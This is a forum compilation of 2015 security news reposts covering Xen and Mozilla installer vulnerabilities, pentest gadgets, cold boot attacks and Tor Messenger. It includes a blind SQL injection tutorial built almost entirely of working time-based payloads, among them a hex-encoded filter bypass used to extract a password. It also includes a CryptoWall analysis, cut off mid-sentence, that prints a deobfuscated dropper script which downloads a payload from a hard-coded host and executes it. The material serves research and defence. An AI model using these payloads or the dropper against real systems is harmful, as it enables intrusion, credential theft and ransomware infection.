the human form in two stages: First, it scans a given space in three dimensions to capture wireless reflections off objects in the environment, including furniture or humans. Given the curvature of human bodies, some of the signals get bounced back, while some get bounced away from the device. RF-Capture then monitors how these reflections vary as someone moves in the environment, stitching the person’s reflections across time to reconstruct one, single image of a silhouette. To differentiate individuals, the team then repeatedly tested and trained the device on different subjects, incorporating metrics such as height and body shape to create "silhouette fingerprints" for each person. MIT says the key challenge is that the same signal is reflected from different individuals as well as from different body parts. How do you tell the difference between various limbs, never mind entire humans? Katabi says it boils down to number crunching: The data you get back from these reflections are very minimal. However, we can extract meaningful signals through a series of algorithms we developed that minimize the random noise produced by the reflections. Sursa: https://nakedsecurity.sophos.com/2015/10/30/researchers-use-wi-fi-to-see-gestures-identify-individuals-through-walls/

CoinVault and Bitcryptor ransomware victims don't need to pay the ransom Posted on 30.10.2015 Kaspersky Lab has added an additional 14,031 decryption keys to their free repository, enabling all those who have fallen victim to CoinVault and Bitcryptor ransomware to retrieve their encrypted data without having to pay a ransom to cybercriminals. The cybercriminals behind CoinVault tried to infect tens of thousands of computers worldwide, with the majority of victims in the Netherlands, Germany, the USA, France and the UK. Consumers from a total of 108 countries were affected. The criminals succeeded in locking at least 1,500 Windows-based machines, demanding bitcoins from users to decrypt their files. Kaspersky Lab discovered the first version of CoinVault in May 2014, and later completed a thorough analysis of all the associated malware samples for the investigation run by the National High Tech Crime Unit (NHTCU) of the Netherlands’ police and the Netherlands’ National Prosecutors Office. During the joint investigation, the NHTCU and the Netherlands’ National Prosecutors Office obtained databases from CoinVault command & control servers. These servers contained Initialization Vectors (IVs), keys and private bitcoin wallets, which helped Kaspersky Lab and the NHTCU to create a special repository of decryption keys: noransom.kaspersky.com. Since April 2015, a total of 14,755 keys have been made available for victims so that they can release their files by using the decryption application developed by Kaspersky Lab’s security experts to release their files. In September, the Dutch police arrested two men in the Netherlands on suspicion of involvement in the ransomware attacks. With these arrests, and the fact that the last portion of keys has now been obtained from the server, the case on the CoinVault attacks is now closed. “The CoinVault story is ending: the remaining victims can retrieve their files and the cybercriminals have been caught, thanks to collaboration between the Dutch police, Kaspersky Lab and Panda Security. The CoinVault investigation has been unique in that we have been able to retrieve all the keys. Through sheer hard work we were able to disrupt the entire business model of the cybercriminal group,” said Jornt van der Wiel, Security Researcher at Global Research and Analysis Team, Kaspersky Lab. Sursa: http://www.net-security.org/malware_news.php?id=3137

Critical vulnerability allowed some guests to access underlying operating system. by Dan Goodin - Oct 29, 2015 7:34pm EET For seven years, Xen virtualization software used by Amazon Web Services and other cloud computing providers has contained a vulnerability that allowed attackers to break out of their confined accounts and access extremely sensitive parts of the underlying operating system. The bug, which some researchers say is probably the worst ever to hit the open source project, was finallymade public Thursday along with a patch. "Venom" allows attackers to break out of guest OS, escape into host. Patch now! As a result of the bug, "malicious PV guest administrators can escalate privilege so as to control the whole system," Xen Project managers wrote in an advisory. The managers were referring to an approach known as paravirtualization, which allows multiple lower-privileged users to run highly isolated computing instances on the same piece of hardware. By allowing guests to break out of those confines, CVE-2015-7835, as the vulnerability is indexed, compromised a core tenet of virtualization. It comes five months after a similarly critical bug was disclosed in the Xen, KVM, and native QEMU virtual machine platforms."The above is a political way of stating the bug is a very critical one," researchers with Qubes OS, a desktop operating system that uses Xen to secure sensitive resources, wrote in an analysis published Thursday. "Probably the worst we have seen affecting the Xen hypervisor, ever. Sadly." Thursday's disclosure comes a few weeks after Xen Project managers privately warned a select group of predisclosure members of the vulnerability. That means Amazon and many other cloud services have already patched the vulnerability. It would also explain why some services have recently required customers to restart their guest operating systems. Members of Linode, for instance, received e-mails two weeks ago notifying them of Xen security advisories that would require a reboot no later than October 29, when the updates would go live. An Amazon advisory, meanwhile, said the update required no reboot. “Really shocking” The Qubes OS analysis criticized the development process that allowed a bug of such high severity to persist for such a long time. It also questioned whether it was time for Xen developers to redesign the hypervisor to do away with paravirtualized virtual machines. Qubes researchers wrote: Admittedly this is subtle bug, because there is no buggy code that could be spotted immediately. The bug emerges only if one looks at a bigger picture of logic flows (compare also QSB #09 for a somehow similar situation). On the other hand, it is really shocking that such a bug has been lurking in the core of the hypervisor for so many years. In our opinion the Xen project should rethink their coding guidelines and try to come up with practices and perhaps additional mechanisms that would not let similar flaws to plague the hypervisor ever again (assert-like mechanisms perhaps?). Otherwise the whole project makes no sense, at least to those who would like to use Xen for security-sensitive work. The vulnerability affects Xen version 3.4 and later, but only on x86 systems. ARM systems are not susceptible. Only paravirtualization guests can exploit the bug, and it doesn't matter if the guests are running 32-bit or 64-bit instances. Now that the vulnerability has gone public, it's a fair bet that unpatched systems will be exploited. Anyone relying on Xen who has not yet updated should install the patch as soon as possible. Sursa: http://arstechnica.com/security/2015/10/xen-patches-7-year-old-bug-that-shattered-hypervisor-security/

Arbitrary code execution resp. escalation of privilege with Mozilla's SETUP.EXE From: "Stefan Kanthak" <stefan.kanthak () nexgo de> Date: Wed, 28 Oct 2015 20:04:23 +0100 Hi @ll, Mozilla's (executable) full setup packages for Windows allow arbitrary code execution resp. escalation of privilege: their SETUP.EXE loads SHFOLDER.DLL ['] from a temporary (sub)directory "%TEMP%\7zS<hex>.tmp\" created during self-extraction of the full setup packages. This vulnerability is well-known, every developer past absolute beginner should know about it: <https://capec.mitre.org/data/definitions/471.html> See <https://bugzilla.mozilla.org/show_bug.cgi?id=792106> for all the trouble Mozilla's developers went through to fix this vulnerability in the 7zip self-extractor. See <https://bugzilla.mozilla.org/show_bug.cgi?id=961676> for this vulnerability in their maintenance_installer.exe. Proof of concept: ~~~~~~~~~~~~~~~~~ 1. fetch any Mozilla full setup package (these are self-extracting archives built with 7zip), for example "Firefox Setup 38.3.0esr.exe" from <https://www.mozilla.org/en-US/firefox/organizations/all/> 2. extract this full setup package into an arbitrary directory, for example "%TEMP%\7zSxyz.tmp", using (again for example) 7za.exe x -o"%TEMP%\7zSxyz.tmp" "Firefox Setup 38.3.0esr.exe" 3. fetch <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html>) and save it as "%TEMP%\7zSxyz.tmp\shfolder.dll" 4. start "%TEMP%\7zSxyz.tmp\setup.exe" per double-click: the installer detection of Windows user account control (see <https://technet.microsoft.com/en-us/library/dd835540.aspx#BKMK_InstDet>) will chime in and prompt for consent resp. for an administrator password, then "%TEMP%\7zSxyz.tmp\setup.exe" loads "%TEMP%\7zSxyz.tmp\shfolder.dll" which displays a message box Mitigation(s): ~~~~~~~~~~~~~~ 0. DON'T USE EXECUTABLE INSTALLERS [²]! If your favourite applications are not distributed in the native installer package format of the resp. target OS: ask^WURGE their vendors/developers to provide native installation packages. If they don't: dump these applications, stay away from such software! 1. Turn off privilege elevation for standard users and installer detection for all users: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "ConsentPromptBehaviorUser"=dword:00000000 ; Automatically deny elevation requests "EnableInstallerDetection"=dword:00000000 See <https://technet.microsoft.com/en-us/library/dd835564.aspx> 2. deny execution in all "%TEMP%" directories and their subdirectories: * add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories" (use CACLS.EXE /SDDL for example); * use "software restriction policies" resp. AppLocker. stay tuned Stefan Kanthak PS: Mozilla sits on this unfixed vulnerability for about 30 months: see <https://bugzilla.mozilla.org/show_bug.cgi?id=861012> ['] SHFOLDER.DLL is cruft from the last millennium, it was used on Windows 9x without Internet Explorer 4; see <https://support.microsoft.com/en-us/kb/241733> DONT USE the code shown in this MSKB article! See <https://msdn.microsoft.com/en-us/library/ff919712.aspx>, <https://msdn.microsoft.com/en-us/library/ms682586.aspx> and <https://technet.microsoft.com/en-us/library/2269637.aspx> [²] self-extracting archives and executable installers are flawed^W insanely stupid in concept and dangerous in practice. DON'T USE SUCH CRUFT! ALWAYS use the resp. platforms native package and archive format. For Windows these are .INF (plus .CAB) and .MSI (plus .CAB), introduced 20 years ago (with Windows 95 and Windows NT4) resp. 16 years ago (with Office 2000). Both .INF and .MSI are "opened" by programs residing in %SystemRoot%\System32\ which are therefore immune to this kind of "DLL (and EXE) Search Order Hijacking" attack. Since both .INF and .MSI can access the contents of .CAB directly they eliminate the attack vector "unsafe temporary directory" too. See <http://home.arcor.de/skanthak/temp/FIREFOX.INF> and <http://home.arcor.de/skanthak/temp/FIREFOX.DDF> as example of a native installer package for "Firefox 38.3.0 ESR (x86 de)": 1.a. create FIREFOX.CAB from the unpacked full setup package (see above; I used the german language version): run the command line MAKECAB.EXE /D SourceDir="%TEMP%\7zS<hex>.tmp\core" /F FIREFOX.DDF 1.b. create FIREFOX.CAB from the copy installed on your system: run the command line MAKECAB.EXE /D SourceDir="%ProgramFiles%\Mozilla Firefox" /F FIREFOX.DDF 2. install Firefox from FIREFOX.CAB: right-click FIREFOX.INF and then click "Install", or run the command line InfDefaultInstall.Exe "<path>\FIREFOX.INF" resp. RunDll32.Exe SetupAPI.Dll,InstallHinfSection DefaultInstall 132 <path>\FIREFOX.INF _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ Sursa: http://seclists.org/fulldisclosure/2015/Oct/109

Evaluating, Testing and Breaking Security Software Breaking security software!!! Slides here: https://www.dropbox.com/sh/h2o7y5s5ijl2awx/AAAdeR4DTiCU_izt_1RJhXVAa?dl=0

Tor Messenger Beta: Chat over Tor, Easily Posted October 29th, 2015 by sukhbir in Today we are releasing a new, beta version of Tor Messenger, based on Instantbird, an instant messaging client developed in the Mozilla community. What is it? Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enablesOff-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages. What it isn't... Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor.We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too. Why Instantbird? We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users. Current Status Today we are releasing a beta version with which we hope to gain both usability and security related feedback. There have been three previous alpha releases to the mailing lists that have already helped smooth out some of the rougher edges. Downloads Linux (32-bit)Linux (64-bit)WindowsOS Xsha256sums.txt sha256sums.txt.ascThe sha256sums.txt file containing hashes of the bundles is signed with the key0x6887935AB297B391 (fingerprint: 3A0B 3D84 3708 9613 6B84 5E82 6887 935A B297 B391). Instructions On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory. Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended. Source Code We are doing automated builds of Tor Messenger for all platforms.The Linux builds are reproducible: anyone who builds Tor Messenger for Linux should have byte-for-byte identical binaries compared with other builds from a given source. You can build it yourself and let us know if you encounter any problems or cannot match our build. The Windows and OS X builds are not completely reproducible yet but we areworking on it. What's to Come Our current focus is security, robustness and user experience. We will be fixing bugs and releasing updates as appropriate, and in the future, we plan on pairing releases with Mozilla's Extended Support Release (ESR) cycle. We have some ideas on where to take Tor Messenger but we would like to hear what you have to say. Some possibilities include: Reproducible builds for Windows and OS X Sandboxing Automatic updates Improved Tor support OTR over Twitter DMs Produce (and distribute) internationalized builds Secure multi-party communication (np1sec) Encrypted file-transfers Usability study How To Help Give it a try and provide feedback, requests, and file bugs (choose the "Tor Messenger" component). If you are a developer, help us close all our tickets or help us review ourdesign doc. As always, we are idling on IRC in #tor-dev (OFTC) (nicks: arlolra; boklm; sukhe) and subscribed to the tor-talk/dev mailing lists.Please note that this release is for users who would like to help us with testing the product but at the same time who also understand the risks involved in using beta software.Thanks and we hope you enjoy Tor Messenger! Sursa: https://blog.torproject.org/blog/tor-messenger-beta-chat-over-tor-easily

Hardware assisted penetration testing Penetration testing or pentesting is the practice of attacking your own or your clients’ IT systems in the same way a hacker would to identify security holes. Prior to start with the penetration testing you normally need to clearly define the scope and get a written consent from the client, in other words you need a pre-engagement contract signed by your client. Depending on the information in your possession it could be a white-box or a black-box pentest. You’ll also need to follow a standard methodology while conducting the test in order to ensure quality, reproducibility and comparability of your pentest. I’m not going to talk about this now but I plan to write a series of articles on this matter in the future. Every ethical hacker or penetration tester uses a variety of software in order to accomplish various tasks, some are well known frameworks for vulnerability assessment like Nexpose, Nessus and OpenVAS (just to name a few) or exploitation frameworks like Metasploit, CoreImpact Pro and Immunity Canvas, together with in-house tools. Obviously any software needs a personal computer, a server or a Cloud instance to run. Apart from this, there is a variety of other small devices and appliances that can assist a penetration tester during his job and today I’m going to talk right about this. HARDWARE KEYLOGGERS Hardware keyloggers are used for keystroke logging, a method of capturing and recording computer users’ keystrokes, including sensitive information like passwords and credit card numbers. They can be implemented via BIOS-level firmware, or alternatively, via a device plugged inline between a computer keyboard and a computer. They usually are made of a microcontroller, a flash memory and a USB or PS/2 connector. USB KEYLOGGER PS/2 KEYLOGGER KeySweeper Wireless Keyboard Sniffer COVERT KEYLOGGER KEYBOARD HARDWARE VIDEO LOGGER (FRAME GRABBER) SIGINT AND TEMPEST SYSTEMS SIGINT (SIGnals INTellingence) is intelligence derived from electronic signals and systems used by foreign targets, such as communications systems, radars, and weapons systems. SIGINT provides a vital window for our nation into foreign adversaries’ capabilities, actions, and intentions. TEMPEST is a National Security Agency specification and NATO certification referring to spying on information systems through leaking emanations, including unintentional radio or electrical signals, sounds, and vibrations. TEMPEST covers both methods to spy upon others and also how to shield equipment against such spying. The protection efforts are also known as emission security (EMSEC), which is a subset of communications security (COMSEC). For more information about TEMPEST see here: The Complete, Unofficial TEMPEST Information Page . TEMPEST ATTACK Van Eck Phreaking demonstration Another interesting demonstration was given in a 2009 BlackHat talk entitled “Sniffing Keystrokes With Lasers/Voltmeters – Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage” by Andrea Barisani and Daniele Bianco of Inverse Path Ltd. https://www.blackhat.com/presentations/bh-usa-09/BARISANI/BHUSA09-Barisani-Keystrokes-SLIDES.pdf WiFi HACKING DEVICES Devices usually made of a router with an antenna capable of packet injection and a custom firmware usually based on a linux distro with hacking tools installed (aircrack-ng and others). An example of such device is WiFi Pineapple: WIFI PINEAPPLE The WiFi Pineapple Mark V is the latest generation wireless network auditing tool from Hak5. With its custom, purpose built hardware and software, the WiFi Pineapple enable users to quickly and easily deploy advanced attacks using our intuitive web interface.From a man-in-the-middle hot-spot honeypot to an out-of-band pentest pivot box, the WiFi Pineapple is unmatched in performance, value and versatility. Another example of WiFi cracking device is Reaver Pro: REAVER PRO™ II Reaver Pro is able to crack a WEP password in only a few minutes, also WPA cracking is fast in case WPS is enabled. PENTEST BOXES MiniPwner – made up of a portable TP-Link MR3040 running OpenWrt MINI PWNER Pwnie Express solutions: PWN PLUG R3 PWN PRO PWN PHONE PWN PAD #r00tabaga is thinner than the MiniPwner, smaller and lighter than the WiFi Pineapple, and has a built-in 2000mAh LI-ON battery #R00TABAGA TrustedSec Attack Platform (TAP) – TAP will ensure that the system is always up-to-date with your latest patches and uses the PenTesters Framework (https://github.com/trustedsec/ptf) to automatically install all of your tools and keep them up-to-date. For hardware, it uses the Intel NUC series with a solid-state drive, 16 gigs of ram, wireless alfa attached for wireless assessments and a Verizon LTE card so you don’t have to worry about egress filtering if it isn’t available. TAP is used internally by TrustedSec and isn’t available for sale but the software is open source and can be found here: https://github.com/trustedsec/tap TAP HID ATTACKS A Human Interface Device is a device that can be plugged into the USB port of a computer and is recognized as a keyboard and automatically trusted and executed by the computer (unlike CDs/DVDs and normal USB drives that rely on the Autorun). It can be programmed in order to execute a payload (as keystrokes) that can do many things, even spawning a shell, dumping passwords and escalate privileges. Teensy – a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects. All programming is done via the USB port. No special programmer is needed, only a standard “Mini-B” USB cable and a PC or Macintosh with a USB port. TEENSY There are some libraries available for Teensy, like PHUKD by IronGeek, SET, Kautilya and Peensy. Bad USB – a concept of HID attack vector presented at Blackhat 2014 by Karsten Nohl. USB RUBBER DUCKY – a HID attack tool by Hack5 RUBBER DUCKY MAKE YOUR OWN HACKER GADGET All of us have heard about or used Hacker Gadgets like the WiFi Pineapple, Minipwner, Pwn Plug, R00tabaga etc. They are fantastic to use for demos, in social engineering tasks, explaining security implications in a fun way to non security professionals and in actual pentest task automation! but what does it take to build one? In this course, we will teach you how to build a Hacker Gadget (or Pentest Gadget if you prefer) for less than $50 from scratch. How much technical expertise do you need to follow this course? – if you’ve installed Linux and ever configured an Access Point, you will feel right at home! See the course on PentesterAcademy, a SecurityTube.net initiative. BOOKS Some useful books for creating your own hacker gadget: Happy hacking! Author: Fabio Baroni Date: 2015-10-29 22:46:19 Sursa: http://www.pentest.guru/index.php/2015/10/29/hardware-assisted-penetration-testing/

Ce anume vrei sa modifici din program? Cat de complex e?

nullcon Goa 2015: Cold Boot Attack on DDR2 and DDR3 RAM by Marko Schuba Publicat pe 17 iun. 2015 Cold boot attacks enable access to the volatile memory of computers which are in a running state or have just been disconnected from power. The attack makes use of the remanence effect of DRAM: data in memory is not immediately erased after loss of power – it is slowly disappearing. Even after a minute without refresh, data can be found in DRAM. The approach can for instance be used to recover hard disk encryption keys of a locked computer. In the paper cold boot attacks on DDR2 and DDR3 RAM and their results are presented. While attacks on DDR2 have been demonstrated in the past, attacks on DDR3 have been less successful. The authors explain, how they attacked DDR3 RAM of various types and manufacturers. While many PC mainboards overwrite DDR3 before they are powered off, this is not the case for the board of the ASUS Notebook P53E which was used in our experiments. As a result, memory content could be extracted with a measured bit error rate between 0.0007% and 0.07%. For one DDR3 type an attack without cooling was possible, even though the error rate in that case was high (around 80%). Additional analyses of the experimental results revealed, that error rates strongly depend on the address space of DRAM. For example, one DRAM type had clear 64 kB memory block boundaries: while some blocks had bit error rates of 6% or 3%, others had 0% error rate. Other DRAM types also showed different error rates for different areas. The effect is most likely related to the initial state of the respective DRAM type. Thanks for watching this video and you can join us on various social networking sites. Website: nullcon - International Security Conference 2016 Facebook: NULLCON Twitter: nullcon (@nullcon) | Twitter

Da, util

Blind SQL Injection & BurpSuite - Like A Boss Posted on April 22, 20110 Comments ection used to be a lot easier a few years ago when it was less known, web application security was less mature, and errors were often exposed. It's very easy to use a variety of methods to cause errors to display database names, table names, column names, and even row values... when errors are enabled. These days, the SQL injection flaws that I am finding are largely of the "blind" type. To take a rough guess, I'd estimate this to be the case at least 8 out of 10 times. That is fine because blind SQL injection is still relatively easy to exploit.... with SQL injection in general still being used to greatsuccess in the wild. There are plenty of SQL Injection tools out there that will work with blind or error-based vulnerabilities. Many of these are installed and ready to run on the BackTrack 4 R2. SQLMap is a good one but there are a lot and your success will vary. These tools can do more than just extract database data. They can get you root. Sometimes this just isn't in the cards for a variety of reasons and you just want to show proof of concept that you can pull back sensitive data through the web server. I love Burp's Intruder tool for this. I'll demonstrate some techniques below and use HacmeBank as a target even though errors are completely visible in this purposefully vulnerable app and blind techniques are not necessary. The first thing we do is identify the vulnerable request: We can send this request to the Repeater tool and inject the SQL syntax, " ' waitfor delay '0:0:30'-- " (omit the double quotes). The vulnerable web application will pass this SQL command directly to the login query causing a 30-second pause. That's all just great but we want to do better than just pause the database during our login query. Let's set the HTTP timeout length from 60 seconds to 29 seconds in Burp's timeout options. Ok, now we'll send our delay injection request over to the Intruder tool. This time the SQL syntax, " 'if (len(user)=1) waitfor delay '00:00:30'-- ." It's also necessary to now mark our payload position in Intruder. Put it where the "1" is. Now that the payload position is marked, we need to define the payload. The SQL question is "How long is the USER variable?" Using a numeric payload, we'll guess 1through 30, a wide margin indeed. One more thing to do is to set the Intruder threads to 1, otherwise when one thread delays the SQL database, the others will be delayed as well and false positives will abound. Now we should get the length of the "USER" variable in the SQL server when this Intruder attack is started. When the correct payload number is guessed, the application will pause for 30 seconds, expiring our 29-second Burp timeout value. At this point a good thing to know is what those 3 characters are that comprise the "USER" variable's length. Just open another Intruder tab and we'll change the attack quite a bit. This time the SQL syntax will be " ' if (ascii(lower(substring((user),1,1)))=100) waitfor delay '00:00:30'-- " and there are actually two changing payloads (highlighted in bold). One is the position of the character and the second is the ASCII decimal code of the character in that position. The first payload needs to be numeric and range from 1 to 3 since we know that's the number of the character positions whose ASCII codes we want to guess. For the next payload, we look up our ASCII codes and ponder a bit. 48-126 will get us 0-9, A-Z, and a-z. In our SQL syntax above, you'll notice that we're using the "lower()" function to reduce the number of ASCII code values to guess but our number range will include them anyway so we're not saving any time there. Since we're asking for a username, I doubt there are any special characters (32-47) in it so we'll just be lazy and use 48-126. Running this attack should yield the three ASCII codes for the SQL "USER" variable. Sorting the results by length will put all of the 0-length, timed out, "true," responses in line. Reading the timed out (true) values: Payload 1 value 1 = payload 2 value 100 which is "d" Payload 1 value 2 = payload 2 value 98 which is "b" Payload 1 value 3 = payload 2 value 111 which is "o" Dbo, a good proof of concept but we could have guessed it. Now let's go after some data. How about the SQL syntax, " ' if (ascii(lower(substring((select top 1 name from sysobjects where xtype=char(85) and name like '%user%'),1,1)))=100) waitfor delay '00:00:30'-- ?" This looks for a table that has the word "user" anywhere within. I'm not trying to be sneaky, and blind SQL injection is inherently not sneaky, so I'm just going to guess the length and set the first payload to 1 through 10. Hopefully the table is 10 characters or less in length. I'll keep the second payload at 48-126 (0-9, A-Z, a-z). Running this attack should produce the ASCII codes for the first table that contains the word "user." That looks like 102=fs, 98=b, 95=_, 117=u, 115=s, 101=e, 114=r, 115=s (fsb_users). Right on, so now we want the column names for this "fsb_users" table. For that we need to query the native Microsoft SQL "information_schema.columns" table. To do that, we'll use the following SQL syntax: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users'),1,1)))=100) waitfor delay '00:00:30'-- ." Again we'll use two payloads, one for character position and the other for ASCII decimal code. Running this attack will enumerate the first column in the "fsb_users" table. That spells "user_id" which is not very important to me but it does mean that the syntax for the next column in the "fsb_users" table will be, " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name>'user_id'),1,1)))=100) waitfor delay '00:00:30'-- ." Running this attack yields the second column name of the "fsb_users" table. That's better because this looks like a column name for which I would be interested in row values. The "user_name" table can be used again, iteratively, to retrieve the third column using the following syntax, " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name > 'user_name'),1,1)))=100) waitfor delay '00:00:30'-- " However, let's take a leap of faith and guess at the password column using the "like" operative: " ' if (ascii(lower(substring((select top 1 column_name from information_schema.columns where table_name='fsb_users' and column_name like '%pass%'),1,1)))=100) waitfor delay '00:00:30'-- " Running this will give us the name of the first column in the "fsb_users" table that contains the string, "pass." So now we have the predictable, "password" column which we can pair with the "user_name" column to start pulling some rows out. The SQL syntax will be, " ' if (ascii(substring((select top 1 user_name from fsb_users),1,1))=100) waitfor delay '00:00:30'-- ." I took the "lower()" function out just in case the usernames are case-sensitive in the login function. I want to make sure we account for enough characters that might comprise the firstuser_name value so I'll bump payload 1 up to the range, 1 - 15. We'll leave the second payload the same as before. Running this attack should output the first "user_name" value in the "fsb_users" table. So the first "user_name" is "Jake_Reynolds." The next query will target this user's password. The SQL syntax is, " ' if (ascii(substring((select top 1 password from fsb_users where user_name = 'Jake_Reynolds'),1,1))=100) waitfor delay '00:00:30'-- ." The payload settings can be left alone assuming the user's password is 15 characters or less in length. Running this attack should reveal the password for the user, "Jake_Reynolds." Any web application worth it's salt is going to hash the password columns and use salt so that collision attacks are difficult. HacmeBank contains an unhashed database column. The following screenshot illustrates why you should make sure and encrypt or hash your password columns: "Jake_Reynolds/P@55w0rd" it is then. Let's test it out of course. Works for me. Let's take it a little further though. I have run up against web applications that filter for various SQL syntax like "select" and other basic SQL key words whilst still using vulnerable dynamic SQL statements on the back end. I've always maintained that input validation is not a very effective means of preventing SQL injection and that real remediation means changing your database access layer to use parameterized/precompiled queries. One way I've bypassed input filters that look for common words like "if" and "select" is to create a variable, cast it as hex, and execute it. Take the following SQL syntax for instance: " ';declare @P varchar(4000);set @P=cast(0x69662028617363696928737562737472696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c647327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a333027 AS varchar(4000));exec(@P);-- " The 0x69662028617363696928737562737472696e67282873656c65637420746f7020312070617373776f72642066726f6d206673625f757365727320776865726520757365725f6e616d65203d20274a616b655f5265796e6f6c647327292c312c3129293d313030292077616974666f722064656c6179202730303a30303a333027 is simply a hex-encoded version of the string, " if (ascii(substring((select top 1 password from fsb_users where user_name = 'Jake_Reynolds'),1,1))=100) waitfor delay '00:00:30' . " One extra thing we need to do is to add payload processing rules in Intruder to hex-encode both of our payloads since they occur within the hex cast. Now when we run this attack, we get the same results as before and we retrieve the password for "Jake_Reynolds" with one exception. Our values are now ASCII-hex-encoded values of ASCII-decimal codes. This time, our results are hexadecimal values for our decimal ASCII codes. So if you follow it: Payload 1 value 0x31 = 1 = Payload 2 value 0x38 0x30 = 80 = "P" Payload 1 value 0x32 = 2 = Payload 2 value 0x36 0x34 = 64 = "@" Payload 1 value 0x33 = 3 = Payload 2 value 0x35 0x33 = 53 = "5" and so on until you get "P@55w0rd," an admittedly bad password to use on my precious FoundStone bank account. Anyway, that's blind, delay-based, SQL injection data extraction the hard way using BurpSuite to make it easier. Sursa: https://depthsecurity.com/blog/blind-sql-injection-burpsuite-like-a-boss

CryptoWall 3.0 traffic analysis Posted on October 29, 2015 by Admin A glimpse inside CryptoWall 3.0 Background CryptoWall is known to be one the most popular ransomware.The FBI says it has received 992 complaints about CryptoWall, with victims reporting losses of $18m. Symantec also said that ransomware attacks have more than doubled in 2014 from 4.1 million in 2013, up to 8.8 million. It’s using today’s most sophisticated exploit kit such as Nuclear, Neutrino, and Angler in order to infect the victim. Consequently, this ransomware is using all ways possible to infect victims. The main goal of this destructive malware is to search for all file with certain extensions on the computer victim and network drives to encrypt them. It then asks for a ransom, which is normally $500 USD (and doubles after a certain period of time) for decryption. CryptoWall payment pageInfection Vector The ransomware has multiple ways to infect victims. However, we often see malicious infected email attachments sent to victims containing the dropper. One of the dropper that we studied came from an email attachment in a .zip file. It contained an obfuscated JavaScript file which is used for downloading the payload. It is also common to see word documents containing a malicious VBA macro. .ZIP file received by email, containing a JavaScript fileAfter deobfuscation of the file, we got this code: function dl(fr, fn, rn) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function (){ if (xo.readyState === 4){ var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn, 2); xa.close(); }; } ; try { xo.open("GET", fr, false); xo.send(); if (rn > 0) { ws.Run(fn, 0, 0); }; } catch (er){ } ; }dl("http://22072014b.com/images/global1.jpg", "16477935.exe", 1);dl("http://22072014b.com/images/global1.jpg", "89555869.exe", 1); This script is used to download the payload (from a hard coded URL) of CryptoWall 3.0, rename it and execute it from the TEMP directory. It’s interesting to note that the original payload is a .JPG file, which is a simple trick to hide itself. We believe that this domain (22072014b.com) is owned by the bad guy and it’s also seems to use the fast flux DNS technique. However, this domain is currently suspended by the ICANN.Execution As described in many articles¹ ² ³, CryptoWall begins by: Generating a unique computer identifier by calculation of an MD5 hash base on the system hardware and software (Computer name, Volume serial number, OS version …) Spreading itself in a new folder in C:\ and the AppData folder then adding an entry in startup program Deactivating: Shadow Copies Startup repair Windows error recovery [*]And stopping: Windows Security Center Service Windows Defender Windows Update Service Windows Error Reporting Service and BITS [*]Injecting itself into explorer.exe , svchost.exe [*]Making a GET request to ip-addr.es to retrieve the external IP address [*]Making HTTP requests to retrieve the public key for encryption [*]Starting encryption (AES-256) of selected files, extensions and directory [*]Copying HELP_DECRYPT instructions in every folder in which files were encrypted Although this process is complex enough to make an article on it’s own, the area that we’ve focused on is mostly the network communication side.Emulate communication with the C&C In order to learn more about the communication with the Command And Control, a program was made to simulate the request of an infected computer.First, the malware uses a URL pre-coded in the payload to start the communication. In all cases, the URL’s are infected WordPress websites. Because infected WordPress gets cleaned up or suspended within a few weeks normally, CryptoWall comes with numerous pre-coded URL with which it will try to communicate. The URL changes each time we see a new sub-version of CryptoWall 3.0.The URL looks like the following:http://domain.com/wp-content/plugins/infected_path/3.phpAll communication with the C&C is encrypted in RC4. The RC4 key is passed in the URL parameter and the cipher text is in the POST method.The malware first sends a hello message to the C&C before getting the actual encryption key: Using this python, we can decrypt the message easily: Request: {1|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|5|2|1||128.204.196.126} Response: {264|1} The message is formatted for the command and control, revealing: the message ID, the version of CryptoWall, the unique MD5 hash previously generated, some other flags and the public IP address of the computer.After, the infected computer replies with another message: Request: {7|crypt13|4FB5B06D293F2DD13810B2979DBA08E0|1} Response: 